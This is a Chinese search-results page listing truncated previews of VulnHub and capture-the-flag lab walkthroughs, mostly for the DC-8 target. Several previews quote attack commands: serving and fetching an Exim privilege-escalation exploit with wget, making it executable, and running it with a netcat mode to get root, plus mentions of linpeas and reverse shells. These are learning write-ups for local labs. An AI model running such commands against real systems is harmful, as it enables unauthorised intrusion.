首页
学习
活动
专区
圈层
工具
发布
    • 综合排序
    • 最热优先
    • 最新优先
    时间不限
  • 来自专栏渗透靶机

    Vulnhub靶机:DC-8

    arp-scan -I eth1 -l -I 指定eth1这个网卡 -l 扫描出全部主机 我们知道靶机的IP地址在192.168.30.9后使用namp扫描靶机。 给靶机安排个老三套。 linpeas.sh这个脚本是用于在渗透测试中进行特权升级和系统枚举。简单来说就是提权脚本。 拿下来传到靶机里。 看一下脚本怎么用。 ./46996.sh -m netcat 这样就拿到root了。 后续 体验下来感觉难度刚刚好。这次渗透挺好玩的。

    38510编辑于 2025-01-15
  • 来自专栏闪石星曜CyberSecurity

    靶机闯关 DC-8

    靶机下载: http://www.five86.com/dc-8.html 环境搭建: 导入虚拟机设置NAT。 靶机DHCP已启用 开始渗透: 使用netdiscover二层扫描工具获取靶机IP为192.168.111.137后 使用nmap对靶机网络服务端口进行探测 nmap -A -p- 192.168.111.137

    78510发布于 2020-07-27
  • 来自专栏靶机渗透

    靶机渗透DC-8

    用的时候出现一直失败,重新Shell一下还是不行,后来上网查是直接用netcat方式。

    55720发布于 2020-04-21
  • 来自专栏网络安全自修室

    DC-8靶机渗透实战

    靶机介绍 这次的靶机渗透实战是一个找寻靶机中的flag的过程,并以获得最终的flag为目标。 靶机下载地址[1],需要更详细的资料可以参考文章1[2]、文章2[3]、文章3[4] 信息搜集 主机发现 ? 端口扫描,服务扫描 ? 先访问WEB页面 ? 参考资料 [1] 下载地址: http://www.five86.com/dc-8.html [2] 参考文章1: https://blog.csdn.net/weixin_43762939/article

    1.1K20发布于 2020-08-11
  • 来自专栏/root

    vulnhub靶机实战_DC-8

    一、靶机下载 靶机下载链接汇总:https://download.vulnhub.com/ 使用搜索功能,搜索dc类型的靶机即可。 本次实战使用的靶机是:DC-8 系统:Debian 下载链接:https://download.vulnhub.com/dc/DC-8.zip 二、靶机启动 下载完成后,打开VMware软件,通过左上角文件打开 exim # 结果 # 通过结合靶机版本为4.89 ┌──(root㉿kali)-[/home/dc8] └─# searchsploit exim ----------------------- /var/www/html/dc8.sh systemctl start apache2.service chmochmod 777 /var/www/html/dc8.sh 靶机下载dc8.sh文件 #注意:靶机下载文件需要切换到tmp目录下 cd /tmp wget 192.168.198.129/dc8.sh # 修改权限为777 chmod 777 dc8.sh 尝试提权 # 使用提示: #

    43710编辑于 2025-09-28
  • 来自专栏vulnhub DC 1-9

    VulnHub DC-8 靶机渗透测试笔记

    VulnHub DC-8 靶机渗透测试笔记靶机信息靶机名称:DC-8靶机来源:VulnHub目标:获取 root 权限,找到最终 flag难度:⭐⭐⭐⭐☆(中等偏难)涉及技术:信息收集、SQL注入、hashcat Exim4 漏洞searchsploit exim 4查看脚本路径并复制到当前目录:searchsploit -p 46996#查看searchsploit -m 46996#复制5.3 传输 exp 到靶机 Kali 开启 HTTP 服务:python3 -m http.server 8888靶机下载:wget http://192.168.168.128:8888/46996.sh当前目录无权限,切换到 searchsploit 本地漏洞库搜索 python3 http.server临时 HTTP 文件传输 本文为 VulnHub DC-8 靶机学习笔记,所有操作均在本地搭建的靶场环境中完成,仅用于学习交流。

    21210编辑于 2026-03-08
  • 来自专栏网络安全自修室

    每周打靶 | Vulnhub-DC8靶机渗透实战

    2 内容速览 0x00前言 这是网络安全自修室每周带星球小伙伴一起实战的第7台靶机,欢迎有兴趣的小伙伴一起加入实操,毕竟实践出真知! 靶机可从Vulnhub平台免费下载,并通过虚拟机在本地搭建,渗透实战是一个找寻靶机中的flag的过程,并以获得最终的flag为目标! 攻击机:Kali Linux 靶机环境:192.168.241.141 所用工具:nmap | sqlmap | john 0x01 知识点 SQL注入 exim提权 0x02 信息搜集 端口发现 发现

    61530编辑于 2023-09-02
  • 来自专栏渗透云笔记

    靶机练习 | DC:2 靶机渗透练习

    Kn0sky ---- 环境准备 DC:2靶机 Kali linux DC:2靶机 下载地址: http://www.five86.com/dc-2.html https://download.vulnhub.com : ERROR: Script execution failed (use -d to debug) 7744/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u7 2.0) | ssh-hostkey: | 1024 52:51:7b:6e:70:a4:33:7a:d2:4b:e1:0b:5a:0f:9e:d7 (DSA) | 2048 59:11:d8: af:38:51:8f:41:a7:44:b3:28:03:80:99:42 (RSA) | 256 df:18:1d:74:26:ce:c1:4f:6f:2f:c1:26:54:31:51:91

    2.1K20发布于 2019-10-14
  • 来自专栏OneMoreThink的专栏

    靶机实战(8):OSCP备考之VulnHub haclabs no_name

    使用命令 sudo -u root nmap 172.16.33.49 -n -Pn -p- --reason -sV -sC -O,发现主机开放的端口、提供的服务、使用的组件、组件的版本。

    30710编辑于 2024-10-15
  • 来自专栏全栈程序员必看

    owasp靶机安装_靶机是什么

    owasp靶机应该是每个渗透入门乃至一些高手的一个试炼地之一,以下是我在靶机上搭建虚拟的方法。 1.虚拟机安装 在这里我用的是VMware14,靶机自然也是VM的。 百度云盘传送门【2c4j】 2.owasp靶机下载 下载链接 3.owasp靶机打开 在第二步链接打开之后,将会下载到一个文件 将其解压之后先放着,所放的盘建议有10G以上的内存。 注意看我圈起来的地方,靶机是基于Ubuntu的虚拟机,密码账号都在我圈的地方。 现在点击开启虚拟机就好了。 网络适配器的话就是NAT,为了安全尽量不要用桥接。

    1K10编辑于 2022-09-21
  • 来自专栏靶机复现

    blogger靶机

    wordpress搭建的网站→发现一个插件漏洞任意文件上传→上传shell→python反弹shell→获取vagrant用户密码→登录用户发现可以执行所有命令→sudo su提权→成功获取flag 首先扫描网络获取靶机

    48910编辑于 2022-04-12
  • 来自专栏FreeBuf

    JIS-CTF靶机+Kioptrix靶机渗透

    前言 最近一直在down各种CTF靶机玩,本次分享的2个靶机因较基础,故合并成一篇文章发表,本文章仅为初学者练手学习使用,大神们勿喷,感谢各位大佬! JIS靶机以拿到5个flag为止,本文攻击的靶机为kioptrix level1 以拿到root权限为止。 靶机下载/搭建: 靶机1: https://pan.baidu.com/s/1kt9dMb423DZhIKXObfbwTw ? 靶机2: http://www.kioptrix.com/dlvm/Kioptrix_Level_1.rar ? 开始: JIS靶机全解: 探测网络, IP:192.168.1.135 ? 本次仅为完成获取靶机中全部flag为目的。 Kioptrix靶机过程 先获取靶机IP: 192.168.1.138 ? nmap开路: ?

    1.1K40发布于 2018-07-30
  • 来自专栏闪石星曜CyberSecurity

    靶机练习 | DC:2 靶机渗透练习

    ---- 环境准备 DC:2靶机 Kali linux DC:2靶机 下载地址: http://www.five86.com/dc-2.html https://download.vulnhub.com : ERROR: Script execution failed (use -d to debug) 7744/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u7 2.0) | ssh-hostkey: | 1024 52:51:7b:6e:70:a4:33:7a:d2:4b:e1:0b:5a:0f:9e:d7 (DSA) | 2048 59:11:d8: af:38:51:8f:41:a7:44:b3:28:03:80:99:42 (RSA) | 256 df:18:1d:74:26:ce:c1:4f:6f:2f:c1:26:54:31:51:91

    89420发布于 2019-10-14
  • 来自专栏HACK学习

    渗透测试实战-Blacklight靶机+DeRPnStiNK靶机入侵

    前言 挺久没更新靶机渗透文章,近期抽点时间继续更新文章,为什么这篇要2个靶机写在一起哪?因为第一个靶机虽然被困了几天但是其实比较简单故就和另外一个前段时间玩的合并在一起发表了…. 靶机安装/下载 Blacklight靶机下载: https://pan.baidu.com/s/1n1A7UlgDUHL1RdmXN0CDPw DeRPnStiNK靶机下载: https://pan.baidu.com /s/1ayCZ17PHxFe71vbldjGW2w Blacklight靶机IP:172.16.24.92 DeRPnStiNK靶机IP:172.16.24.69 攻击者IP:172.16.24.31 实战 1.Blacklight靶机 老规矩nmap开路,个人习惯直接全端口… 通过端口探测可以看到该靶机开启了2个服务端口,一个是80,一个是9072端口,其中9072端口显示未知服务…. 且权限为root 该靶机完!是不是很简单…. 2.DeRPnStiNK靶机 老规矩!

    1.4K20发布于 2019-08-07
  • 来自专栏Ms08067安全实验室

    【Vulnhub靶机系列】Breach1.0(附靶机

    文章来源|MS08067 安全实验室 本文作者:大方子(Ms08067实验室核心成员) 文章最后附靶机下载地址和完整版PDF 然后我们访问下新的地址 http://192.168.110.140

    73030编辑于 2022-05-27
  • 来自专栏渗透靶机

    vulnyx靶机:First

    arp-scan -I eth1 -l-I 指定eth1这个网卡-l 扫描出全部主机我们知道靶机的IP地址在192.168.30.11后使用namp扫描靶机

    20900编辑于 2025-01-16
  • 来自专栏网络安全攻防

    XXE靶机实践

    靶机介绍Haboob团队根据https://www.exploit-db.com/docs/45374发表的论文"XML外部实体注入-解释和利用"制作了这个虚拟机以利用私有网络中的漏洞,我们希望你喜欢这个挑战 靶机攻防攻击主机这里我们使用Kali linux和Windows 11作为本次攻击主机:信息收集由于靶机和攻击者主机Kali处于同一网段,所以我们进行一次网段扫描探测,最终确定靶机IP地址为192.168.204.138nmap -sS 192.168.204.135/24在浏览器中访问靶机的80端口,发现只有一个apache服务启动随后我们进一步探测目标信息,使用dirsearch进行目录扫描dirsearch -u http 随后再次进行base64解码得到一大串数据信息随后保存以上解码后的文件并以php进行运行(需要低版本的PHP,建议PHP5),得到flag:SAFCSP{xxe_is_so_easy}文末小结本篇文章以XXE靶机为例对

    45910编辑于 2023-12-22
  • 来自专栏渗透靶机

    hackmyvm靶机:quoted

    arp-scan -I eth1 -l-I 指定eth1这个网卡-l 扫描出全部主机我们知道靶机的IP地址在192.168.30.66后使用namp扫描靶机

    25300编辑于 2025-05-22
  • 来自专栏渗透靶机

    hackmyvm靶机:Icecream

    arp-scan -I eth1 -l -I 指定eth1这个网卡 -l 扫描出全部主机 我们知道靶机的IP地址在192.168.31.204后使用namp扫描靶机。 因为这个靶机的/usr/sbin/ums2net是提权点。所以我们要创建一个a.conf 写入3000 of=/etc/sudoers。 先开启它,在用echo传东西。 太难了这个靶机

    38700编辑于 2025-05-08
  • 来自专栏渗透靶机

    vulnyx靶机:Beginner

    arp-scan -I eth1 -l-I 指定eth1这个网卡-l 扫描出全部主机我们知道靶机的IP地址在192.168.30.16后使用namp扫描靶机。 这个靶机突破口在UDP端口上,这个我确实没注意这个东西。nmap 192.168.30.16 -sUudp开放了68,69端口。69的tftp有漏洞。找到一个backup-config的文件。 这样就拿下root了后续其实整个靶机都在测试你拿密钥的能力。但是开始的那个tftp的其实是没想到。

    23800编辑于 2025-01-21
领券